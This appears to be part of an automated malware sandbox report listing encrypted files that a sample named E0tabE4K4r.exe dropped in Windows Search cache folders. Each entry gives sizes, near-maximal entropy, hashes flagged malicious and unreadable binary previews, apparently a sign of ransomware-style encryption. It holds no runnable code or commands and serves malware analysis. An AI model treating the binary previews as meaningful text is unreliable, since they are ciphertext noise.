                                                                                                                                                  Preview:[{"Sy.L:...-..b.qri.{4y..:..1...@r..=..'......T....5.^.c...7.c.1.j.2.fI`k....}..im.\....^rEwU.{.V\./.C.J.W .N?...&yB.5...$W).J..m`c.?..AwS.t.\$b=,,.p.|........a/...Ae...<Lt.VE.).y.....<..zRZp....$...V+b.{z>..h..V...7a.`xb...@...r.e......?...gE.D.j]...>0m\....x}0..........5.u.....tx.*.I.gb.....(..:.......M..6..Q.79..(....\.8]c^/|Jt_...:c.7.._.......s...O....@.p6@^E....s..\..M......W.......<>_Rd^..h....cJ.]..wx.-l..$.@._$. ..!<..?.5X......&iJ...cH/.r.[c|(......&..Q".h..w`.^.:.JY.K}....m... .(/.........B...k..*I|.r29*.)..V...X...tR.1.).N".S)v.h........%tw.]P......=.....|.^...jt..X ..O1.....G.{.{C{.x.NQ^C^.5...1'...|.n......q.D.%.d.v,Q.8...({.......k...3.7....u..T.'..A...Q9...1..d.=.6.....R....Bp7.~)u_..C.`.....X.K..\.t.^.;...GJ...i..w2-...k......D.:e....10*>..0....?. .*~.<.$xy....'.F..F.M.Kg..Q.O.......o..."'W..@......m.-W.6...IE.L.M...w4I..dr.1.|#MNAQ.~..5.0.x.>..*^..........w.........3...>.....D.......7...{........UQ.9....]....K.\..]....h_.[..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409769948369965.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):104124
                                                                                                                                                  Entropy (8bit):7.998162879351682
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:/qj9K8VhXbl44W6GeXFnyY3ayzXqqLBel1ZPXVtL0k1PBcnijNtMFejFIoAliKHS:S5XhS65v3ayzXqh/tL9onyN8elXMFfMD
                                                                                                                                                  MD5:871115E5210D9B0F6FDE34A6FDE079A5
                                                                                                                                                  SHA1:9AB1C38F29D13B10E79F8F6993E2B657CB92696D
                                                                                                                                                  SHA-256:3854A9C95A248767890B64CEF53087A4C19139D754BBC41FF7000E011D88A2E1
                                                                                                                                                  SHA-512:06FBB883C944F187D5067581019B09B19CF6D912D4C68D91DFDB4328BC3371C4B9B4716C0D4746AD4C983A60A903929AE0422754192713284CF5AF7B9B82FA33
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy2.h...\}....._..3...4D.:;.b~..Y.!It.|...r..&.9."u..).d_u~Q.lxr.(,..$.{.......W..JD..l....1].tdzH..UJ.x..o[./.Hb.#G.OZC..O...O.U.......i..@Q..Z..W...v..IE@.RN..R.T'=.e.9B`...b.P.8..8.fI........F...fH.J.RX....a.g.Al..xnN.&.{WI..[.>...Z!.....G..Z...3.n..$.!z.,..2....."l...QM..3......._.t..{...]......C..].$e......o[..../.`._?.s........B.fj.J.S...X~^|..y.L...[....\t.>......Wu.l.!?.x3.!%.J.[3...;ihG...u...............Yz..l...s'..F.P./IS+.F.V..(?..q..p..6e....S.z=..LH'.H\..d.\..:}.[....gO..G...>4.9(..7.B).Z...s.U.$...."..s..}.bLU...<=.....<.*n..8.h...4..{...U....3pe.....|?..=.R-..%.....e....=..sF..o.E.#..`3.z...pP...v!.3..@.!.^.W.9.+......nQ....8m..a|..........,...../.........Q$Q....}|.F....^D..rp......../.v.2H..k.^.B..+.j..>v...,4.......l.HoW{...H.dql._V.7u....G.....v.&..Ta^..^......4.G...=.Y.........m.....^.........9`.ye.G.x..5.Y..mQ.y.G......=.l.k...<-&Z|......9......\.`.r@q.....=.51.....*.8..5...3..lG].....`......{.K.O....Q..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409770108031868.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):104124
                                                                                                                                                  Entropy (8bit):7.998513189661532
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:AYxPXo4F7oPw9u7YhdYNyTbEED0fSy1iF:nPR7oPwUSdpTbEEDESm+
                                                                                                                                                  MD5:82ED61DB199CF6AC967CCD9C72AD4E68
                                                                                                                                                  SHA1:79068EB7C0F9342CA0EF2437161A803EC17A04CF
                                                                                                                                                  SHA-256:0DB561948504C13BB7908D08A7A569E309A5D1FC9A70A0F50BA2F3EA5FDF8993
                                                                                                                                                  SHA-512:042FC8D3E984EB0A09D7B14944A5E2C01A6AA8155331DC8875DD6DF97246F630E827DB1FE4B00519207C2E80822864A283D56B58DC32DE26E68DC58E5E8135C6
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy.-J.....|ef...o.R."..\....mB..j....#.Z.....GZ..'p...5.m.m<......A`5.!........k..LR....1../..q}I....d,.?[.i...tY..@.jL..~.."..o.*{.....d$.jF3.zrCT.5'.%@.1...@.Oq.:...7.$j........f....{.kYRR2..........W]).a.....i.....n..w..,."......H.%..C..9.....#"1...!...`......1,}7.....=.W..%...#.n....i.irEO Vq.ne.zH...(#..y......g.W.-..........z.....E.g.i../%..p.....=OA.Q..._..m..6...|......g*RI...N..R.....y..o..6...0AW..\..0V.:n..m......m..Qhdz.r..*u....'FR.o..i...,.L.*.kr......(.90.....s....]P..r..w4w...$..u.=....|.q..AB.....w..l\? ..R.8.4..a..y}sdSL.u9..".........~1A.....P....|..*..O.........LCs!..n..D).M..9.'..../...D.(&.F...Zk.O.D....R2.D1N.........O......~..<~..v.......j(...f.c^.V.i.....a...7y..D....t-.fp........6..J..2|.n.{^.,?.4@.~@....^o.^..B..>.....7Q^s.huF.`..Qjm...P.?.(....*...w..l.EG..?....D..ZD.5.pFJ..J(.......X.0.....":.d....e(Llv...[s1..q]...r..Lr%...8...K.m6.}......!;T.....q.@...on.*..fH..m..%..">6..E.v..........$.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409770142418990.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):105064
                                                                                                                                                  Entropy (8bit):7.998418285913827
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:Q6cWjJOQXmx7hEp7dcQ8smBckaj0HCqECltw:rvjJsxtEJdN8sqc/AHAClu
                                                                                                                                                  MD5:7EA6029FDBE6BAAD570CB73CE75D3EE0
                                                                                                                                                  SHA1:7071BF784D63C7263D9439C12478BE83BCFCBA63
                                                                                                                                                  SHA-256:869A7ED8B14032D8A048D0BBDA55A24107AD52D61F474D3EA2A80D0AB2D2A123
                                                                                                                                                  SHA-512:CE01398A831494B4DCE8AEA65655EBFC286044255DDC565D215101D39E587B5F38D050D25D3ABB5C78998EAC64F756D213D47B760EDEE9079628CC73B0B7248B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy2..fs..H..rp?...1KI..1....t..."uh.N.g.w........K.t.._.M(.O/..}V+@.....xh.X.um.nd...*..Y"...m. .05.p.N'.I7{V..^W..?.f...AP.......nh.6.{.Df.34.....F`.6.Q@..N"........m.^..(U...J..,....LB....3...D...WA..O.4.....4K#g.#.<`.W..w._.k..#.*...K...,.Xb..M2.L...z.Z%}Y....P.=.;....../m.......~.J..s..L..Q....R.3@..a.....@..$...s..Z..t..uVq.......Glg}N....Y|......7.f..Pn.h.........:.K.......e...z}..Q..h...N.gM..g.|p.$...RPz.....t.m...$.\..^......Z0...J.q......_.:.W.\[d..G..8..Q....@..S.o..tn...R..R...7.A..OJ..HL..z.x.>4.l._.....~......S......)T.])(......0..#..].W......)r.....Ew....2...f.`...R.lw...9..G\.......~..g.z.-.b[...@,...3F.J.{mh..]....8...t....^.$.3.,Z4.........C....#....GxzHx2.=,...z....cZ.zI.. W.T....|<L1NM.....?.-.....{s...i(.F0%%.P..em..H..F..C..0.Y..l...|....,.<zd5..B....}.0R.:de..1'T...Ekr."..............wA.v3...Y..v.....iS......3....~.%...i.VD.$.=%`...k.....%\.....;.$H.n... -....l0vg.m...$...../o...?@'C..<.{R.....u.......v

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409770163025792.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):105064
                                                                                                                                                  Entropy (8bit):7.998000556650176
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:LUkdMnfFbe8Wm84Y9L5hRj8ScWyAPxA2yBElNN43ryq:o1fP+j8XWynVq14mq
                                                                                                                                                  MD5:EC4A9D0F05F4CC4E4602BA99EBDF32C1
                                                                                                                                                  SHA1:E05EC90C165D73B1C0E30CCDACC56207236349D1
                                                                                                                                                  SHA-256:E6ABA33B5A75224CED82EBA48B5DB9CB59AA979A3A4B9A3540F8E082F268EDD2
                                                                                                                                                  SHA-512:57C88EB94D68929DB7474A0568A6B8E7BF5242160E0114D577A9B5D5C9FE3E461A67C8070B53EC4B77E320CAF150700579375C54626B9B9E10AAA524D5E47E56
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy......h9!N...z.Da.L..S....._t+-.(..S...X.;5......c.Ek..0.jd~..3..J){H..r...u..S......-...qnM...A..6{.@.x.g...9#..=.f..G..dI\..].u..3....X....k..P..F6.......]...........TLG....TX..`xjJ.. .d3B.X=...`S....:_d8..v.V%.(.N9....d....... .p........[..X...@).#...... .[wa.....U..T?m.b.;.3B}.....7.`.R./*%...c.)..z.).....btw.q!... d.....h.....wM..?.....c.........5e.M.{.Q~O<...!/(&.V.........v.Q.....P:........T./.XN.....:B.nR/.s(.M...6.....;..Q.Z$.W9FYp..h.a..t(.I..qw<Xs.b..5.$k.!. ...M.E_..#o.)..t..\,.x...t.[...#S...u...<....4.....j.....L..RVR.q.b..o..'..... dYAR)...~8.jgC[O............B).LW.S.".w.P.;.k.'...zy....Pv. JH.sgw..dZ.....L./.CC.4L%..Ua.Z~....0+...?.U=~..pCW...F..^3..U."k.........5l...s.k....q.o.X..%.....$...^..x.%..tN.........[9A..W...$....qJ..ioL..=.r.E..$.K.-.....?.G..b.../..1.Vs.{.[.V...k(.yb....h..r.....T.....T.`{.].V..y"......UA.O.%+.....q.Z..4.v..g.l2.Q.eYq...7o.J........t..7......@.;?{.....fizr.J.........g..Kh=......j...}8

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409770440715848.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):105520
                                                                                                                                                  Entropy (8bit):7.998173802910973
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:UQRxGHg2LCffNJxiwuVx7hfSqudfg2tWcggn9jD9wRvUwUbj26OVf8tUXJultIq+:c3C7owuVd0fg23cUef8UOMcyVI1O
                                                                                                                                                  MD5:FF757110C6DEC17595FCBD892A053009
                                                                                                                                                  SHA1:620B8B8C5F4F3676DDEEAC5564AFEBC075A12FAE
                                                                                                                                                  SHA-256:612979AF3E269A037CA89A62C4575653ED63D9A4BE86BDF701A9B6FA310DC5E3
                                                                                                                                                  SHA-512:B12DC77C0AEC808388893BB6FE1F77B4475F2BD6B60F7672512A2E0BEBA22D32EC7EA8CE9A17B23A6B2D631AC705A694CF76BF1AF5D80879DB16F27CEFB579FB
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy`...[.L.....UH.D..U...C.V...U@8.TpT..6.Q..W#.*R.d...A......Q.S..~.E..(oI...\..}....I=.9......$)_..z.>eB.|$.t".Dn.+9.vX.oR.B.Q....s.X...y.......kqa.g..^..n.e.........]e...,./~|~`...........`5}...K"o../.0...W."%.%.M7..]x..%....G...@*................<K....#'..le..[...........n.v. v..L.}>......V..Z...-..'...\A..p.1..].[..U.{.h.I..l..dy,l4...B....D....u..P.{F..6...*_.t.ri..>..G!.\...Yq........q....aI..H.~>.......d.e..S.O..O.<k+..X*.4...i..zm..z.)..E.....7.?n....ut.....L...I.....+$.B1...y....".}.A\6.).=Zo....O.j..T._. ....B...&V.5..v...m..(....c...G3M.Z...U..pa..e....0.MgQ.2..r..G...x;...uP.|Z...I..w.A...%.>..?.>M......)1m......ox.(.R04.f.b.^.H!gb[.S>........b[;..q40.=/.}M......Y.o}..a...g.A..<.p...1Y.....#c........c.,}......w...A._x.....O:wH...Oc.N.....$.c[....E*.....W+...Q...y.4.z..h#..............Sc...\>;..%D.L.c....m.RZ.9&.cXZg..=..po.....@!:.....m..x%d.>....`.m$.....h..SY..J:.mk.........g.t..J99.r.....E..$&..........C:.*.....rR.Cv.A!.r^..@.M......`

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409770577178942.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):105538
                                                                                                                                                  Entropy (8bit):7.9983144295041
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:B1L51vOn1DJen1aHMhs2EJTQo8WmVXS8ONPXCUOS:nHWDA1sKEJk2KXSF1l
                                                                                                                                                  MD5:F782356FE71606FFCA1604332578FBD9
                                                                                                                                                  SHA1:14AE550B175E608431A3EA5E26B6AF8860A856A8
                                                                                                                                                  SHA-256:5FB68E3E9BA12CABCB79733994E9C794F783822C547350ABB39FDD3FB733DE69
                                                                                                                                                  SHA-512:69BBE250B6E70B25E6D08EAC8533FFAA1AB669FC7B1CFAC10A9DC73ECAD66552150F1623607BDBFDDEDC07FCEBFF60CD4786605B61E29E03B3AC1656DC082F70
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy..Q.+..P..ZJ)...p.Q...5.O.[....6...'......c..@Dx..{\V..7....;QSA-].C}szk.%7h.5c...R$..y|}qSw..o.s.l6{y.d.Q>....y9..o..P)C...LB...^p....u..b.p..ef..w._..8KaE..._$.....L+...h.`.LZ.Zxu.].3.C...%.HQi..8/.h.g.1<.r..].6...yI1..RBI......[....2..Xr..ex.".%....vY...}...&.=.-...{s.61s...6..".3.\...B..5.J/2KV...(.n....gZ.=.#....>..."..I...$.S ......a.Y..JP....^<SnM..K..3..\.a........[.i..$...O..K.[.........w..$.x+...l.4..a..A....\.....*.).K.&0.grsO...!F..GX.R)P.U4.PsR.V.B/)...>\.W|....`|CN...9ys..".`...O.s...0.=....RN...K..{w........c...gh..('6....RS....w.E....5.~..C......Os.D.|.Q.B..2......+..W~..?.Dj4..0<Q..|.??DeX.....bI/l.:.X.......0}J."...=?..CH.!....8.j...".....f...5o...fu....A....j....,?.b.......h!C.i.^G.^+.(Gi.:*2.._.{U......Qh..+....<.eZ/F..Z..g....A..r.:..pn.o.F.?E.L..8HV:...t..'TE.d......./:.6I...l...n.....}W..(~U.g....l|d..K.)C4[I....[....'....B......}I..Z..Y.....W.].@....JKq...._..s.....)......0..WS.&Z..j.T=...mG.Y.#.$..&.Sh.,h

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409771301045626.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):105556
                                                                                                                                                  Entropy (8bit):7.9981730657690875
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:/mKV5EjACr2C/gWCDp0Pz3/NBf/osE8rz5w7G:/mKV+AAPc0Pb//xzKG
                                                                                                                                                  MD5:5A60CB9273BE093E5E1110E1B4970361
                                                                                                                                                  SHA1:489224D1CF5E9DB5661D23983EDEAA78E3BB0A3D
                                                                                                                                                  SHA-256:0515D62029808CD27ABDC366C2F7423263034B286E2DCC4D1390D437C499B36B
                                                                                                                                                  SHA-512:A2F5F6A68D2F488E3D76310729DEE1457882F858B1455FDA6E2BEADA34866DA4A42C23586EB2960963D8AF3B446FB58B1A11FFD41ECE3E387A9C6BC8FEF1AAF3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy..aa.yC(........_q....w......D.3|....c.-.........Y..:..71~.|.m...........h.g..E.....E@..I`aP..e..t......:.B9.X.f+....>....f&../..1.;%.w...j....R{O.M.N.c4...u...]....l...#w..#,..H...l.)i..O!b.....k.....A.T^ON.*.....K.c.D`.}..G"Zu.3|.aQn.O..<Ys..}.Pm..I..3.&.W,h.Mf.c..6..j..pI.C....u'.1..vN.D"...LV}....-.&...D..<~.r~.^tB..Kfe?|...Eg.W..u Q1.4:...72..JQ..W..:^..B.|n..u........r_.......^l\.........|@Ex.N.D1.........o.bp..iZ.1..8.M..+2K./%$.)^d.1....wh...(...;..._...3.....+}..QTZ......u.J.N...u%...\&.uI.J..0] ...P=.kIR...N(............9..n;N.....o(....Q.....+..r.o.H...*T1..!Q.B#oK.Tk..k.......O.....H..a.|.....&K....49.j.........HRv.a.$.".M.. .Oi...:.^..........."e`..U....E.......".M$)..I.l=...... n5>L{x..D.W\Ozw.....~.....aO.LD}.!..!....."W....&.w..Q!A...rp.....P...3y.I....<..tK..~.K..h.......7.jy....!.........U.X..a..q...H*A..r..uE.x6......a6....B'.~.0.&....g..77.(....t.A.....8..0.....=.;~......U.O...7.x..Q0. ....L\zc^..s.+.2U<...-...3...X...]

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409772092581893.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):105556
                                                                                                                                                  Entropy (8bit):7.998354158651721
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:Byh5DqkpgrH591eueMCItZncqnGosNiIQfd4nIVQHxbrY7Nx/ZO5VAcmLCHc:K57YZ97BC0v3eIkXkNu5VaLC8
                                                                                                                                                  MD5:92A5309D6C55DF1125578F4F56DE7B45
                                                                                                                                                  SHA1:92635EB4C3FC753592A90788D278E2BECD0A6472
                                                                                                                                                  SHA-256:27DD807BFB8E544B14752243B89070BBE5338818DF2C723CEFA7B97324D53C0C
                                                                                                                                                  SHA-512:32A91E2EEDEE187E86868B5467002D235F83CDE466FFC4019AE3E61C2E6F6E0494C9F2BC799EBE9F8CDB386012D72D55DD8A7BD3CF17EC4FC91EA6D82A8E9D6C
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy+....p.i....Qq.Z..Yv3.-..;J...B......SnO...".....4XT..$G.M./...@......!.C+.h..x<8c..|Z.3B..|.N...u.{'+.,.\..'."_.$....L..Z..g......`............\U..I...........}....;.^..~.D&.'....Y.6.C;o.........eI....,..'x....*.f.ni.".BF. ...j....*.j(......d......[x*=.c.`|..Z. ...p..~AM.V..........T.6P.. .q9.......UQ.^..J~.....Xp....b.........~..y9.A....]N.S....W.rN]...\I+t.....+..r..F....<.......-.k....v.0..Ff....J.@s...[.}..{.%jf.....Q.#.*B......./..k..7.M......40..Ij.);2...v.....j*Q..E....d0.T..C.../.,..X...4.GN3.oz\;...a}..5...M.$$.a=+o....x.........S.2;._->......e........f.m..@.n..K......^..E..C.<........HK....Al.~"...-X)e....\..rg.=v....R..../\.........Sc".LA.g..3+R....)...~]D.J.v...c).2...o0$}D..tC...Mg.{~L..m...p..........I..g.....l.j.."....D.3..$...9.........u..}H..;.:.1.>..y...#.B$*.....u!......B.i.#......@.u..;...c...NP .4K...(+.....a.'.:....UcP....f.0w....W..6J.M+...^.'.....=..I.=..,.4.;.@...{.W...~H...=...WHbg..w....$.....

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409773167264099.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):118127
                                                                                                                                                  Entropy (8bit):7.998484380911387
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:HBClaCzeFWid3HTqoJ6q57Ams4GJNkEkP77BtvMvDgQO:H0l6FJ3xQFJ+Eq77BtvMvDgQO
                                                                                                                                                  MD5:95A18FD17CF66F608BD5A7BD932CEA6D
                                                                                                                                                  SHA1:EB04FF6E8759384969FF2A0ECDF0E80F8B447F50
                                                                                                                                                  SHA-256:4997C3E743B726BD6D33E0E426291763846728A26D5516AF5616F6093099659F
                                                                                                                                                  SHA-512:BB245BAA22452E28FE247DAF601DCCDA98B4B9CA15667DA2883BACFCBDE91411846B54BDD2EDD23B30F1B1163AFE4F92A7BF5525D13376691684D7B0AC888671
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Sy..H:...q#.M.q....l..c.v.t.!..jp...~..b.#F...$ews..u3.C.yWL."...s.../0.}..fZ.......O.Y%..4.....[...g.....S.f.....X....._....9hE.C{._....`G./.d.....z,]..../..^.+..0..`.2.-.T...wL....8./..9.....r5Ie..2....\.z.E....P......v.1g./W.Du.;F.|..a[_....Y.C.@q..4.......**P0....U.S..N....mX.(.X..N..zeir.&..$.Q...>q2....Q..SF.(p.V.h../[........4....8.....+sH.%?.g.O#.-...5d.1.O.fm.K.{...yf..i..i..f...h!.\....3g[..h...f..hU..^....uX.{........6......P...\.X.z..\$)............|.-I((..i{.?...}.b.;... V..r0^,[..w...........I.......{,.<..E..'.V..Y...wF3.d...E..JO).#.Bl..FHM..1e..x\.H.U.Ca...-.....D....6.1EDy.T@rT.}.{....w..JD.....&..W..]X....V_a........$. .`..n....4.Xs;].....X...d.}!.\V.z.N...:(e...GTG.P_y....%.{.u=......s.@.!'g.I..z..s.........S..y;..K...km.1>....<',.-F.n.&.w.g.X.|W..w.s.:.e.jzst6.F..wb....s?e..^..KvN.J...WI...U.CG.k....t..).h.J. ...D..w.(.^.W.S....e...(..pO\g.[.O..Gxt-..4..4r...'.5f .h-..uB.4.>f..Qd~s.;.O...Cd(.1J.8.~....\.........0

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409773692546813.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):118132
                                                                                                                                                  Entropy (8bit):7.998268030882294
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:RMRk3onMq+fnbD0h6kRu27NfY4gCM1rb1h9plzI52SNAlADInJtSz0+w2tbIB+uf:RMRIoMq+PbD0wLIFgx1rJNAsS9Tb0+XQ
                                                                                                                                                  MD5:721C8FCEB35AF630DA4E3D5556BB16FD
                                                                                                                                                  SHA1:F34E9D34F0300A07EFA77624CD603E906D33F2A8
                                                                                                                                                  SHA-256:DD863D340FF77E94D2FC1B1AB8F2C585F68BCBC3603042F29A166062383CC4B3
                                                                                                                                                  SHA-512:304D912AB8678D515437FDA7307EF9F7C74B8977D21E39C3FB01E6DE56B5176E7227A6F2A964A042C62B5AB2E955BCA8F8B03E2784C03454F113536BD8754447
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"Syj\...rB..L...UJ..\.V$%.....Ka.y..C...L...P.l.?.N.>..LV..E8..k.....4).Z`u..Cw'.es+{..j...U.]..... .....pr..a....|.O@]3...u%cF.J JT6.k..>...N!\...7E.6...A.:...$=..A.jx..3.}=...-H...W...2.C..:l.E.Q0.{...o|]g.v.,..nu.@.F._..H.J..n?Bh..0E....l..h..........l.H.-..... ......G[g.zj.]...s....Q...F..Hi..\.........c.=.3..,..r.K0..L..{&....Z.".%..l%......U.?.r..b..{EB.n...mwK^\#.c..U..K......7..n..*d.s...F..r_.Q)...!...!6J.E..`..6.t...pT....6...e.9..+...%.t....c....A....O....JY.4...4>.t.+1..QY.\]...!..L.......Y......r......p..f...V..^..,./...]'........~.3l7..u.._....F.....UrZ...6 ...-M..P .K..`..8....F.....|.8^..._..r.....qw"..2_..W..9....:....B....)..wa.!.H......C..m.x.+(.G`.......RO.@I...:.n5.fz&..t.X.{..N..#./...h.F..A.l.{.....d...@....W.y.3..}...`...f...f.c.... X.K.......Ek.......D....X...5.6.!Z.y..\..y...QhG.N.z..%...hE..`N.......W.y.Q0......$.....fA4aY.A.tM2..0"...H.:)Wz.k...V.......}.... ;..0.\.....5....h.../.J..[J.n.......]k...[1..-.{f..YJJ

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409773990815004.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):118150
                                                                                                                                                  Entropy (8bit):7.998212752482028
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:XBAM1NobOqVjVYMHHu8G6c1JfMoXSAl3nbiDIjU:RZ1GbOqVjLHHuhl7l31Q
                                                                                                                                                  MD5:A366367F57D94A8577F1E8D5B219B392
                                                                                                                                                  SHA1:818A7A40518E4FE6962C7A47707427473A652A46
                                                                                                                                                  SHA-256:28A696D546BF16FD7FD4094CC5E579E7042E66F1D9DF51063AC7803F2F606FB6
                                                                                                                                                  SHA-512:198F65807BC6E39E84EB3F6802F42DBF05A15D52E395CB39FCB978A00801E68984578AA7C583AA1EFCEC45ED4EDDA5E84389C3BE26B0379DCC3EDE9890BB05B9
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"SyjR.K.$c....h+..#.|;..R5.=..5^~.4.J>.D.x.j=.#....C..I}.O8..:..:..<LK8~I..Q.(.....*.z...6L....{./.....In...].S.q.}+i.."Q..q. ..tZUUl..+..#".Yq/q.......=.;...z6..A..!Y....(.+`...7o....J.{...AJ.....t.i..0....q.It .0e.%.vt.y...e.<(.....;A..o0.K...ye...2.'[j`Y....Fpic.T....1.!.8..D.d..C...\...().H...U.. .&..'C..>t..22.}t|.>PK.+....5f.C@...Xzx.nj..h.o!mG.S.(.|sN.G.UT.2f.......Xw)...W...\..g.l..[>..t.../^.".?....l..+K.&).p.b.!..._......L..D..}2.....y..?!l9....+S..?....;.KV.......@.<.Pz..3K.C>..z...'"..{YU#..2d.;fmX%Q..../+.2K..F.......].D.,.F..i1.....Q.-].`;^....R..e.^...^.<U.c...a.. .F...&..i.:...F,hX....{T.L..11),.F......^......b h.IH8c.t't...0p.7.....#f.....(.A7O.@..q..........j....-..&..o@.......v.U.B......."hr..b..........7..6...[..,..^.R....u...V.;..^_...t.z...!.3..m..K.KhX....B.Z]..G.....;1`)..|.$._B.w.:.{........i..d..:...Z.@...jz.....qG.T.....D#s....Y......C....U...V..`...z.....<N;.........Ig.j.....MIa._.|..E28.].yS_..](...M.\6...

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409774930948024.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):117430
                                                                                                                                                  Entropy (8bit):7.99836973945996
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:qk8f2IWwDFVMq2+UnNj7Nam6WFfiTblCeiEAol:qk8jFVM7zNHNam6afiTblCDE7l
                                                                                                                                                  MD5:89AC4962B48FA202365C785F9770A14B
                                                                                                                                                  SHA1:34734A976D30AA928A1E9DBD1180C1EA45C40C5C
                                                                                                                                                  SHA-256:90B9022AAA46C27AD6D757836C7237787378302938A6F1CC6160FB757E260642
                                                                                                                                                  SHA-512:7F088871D856EC53D050C94D2430379A61D8F96051F39151C17999335E454133FA3A520BC607532A6C1DF55FCB91DC1FFE28647A6ECF32BE6EC3F3D4ACD61FCF
                                                                                                                                                  Malicious:true
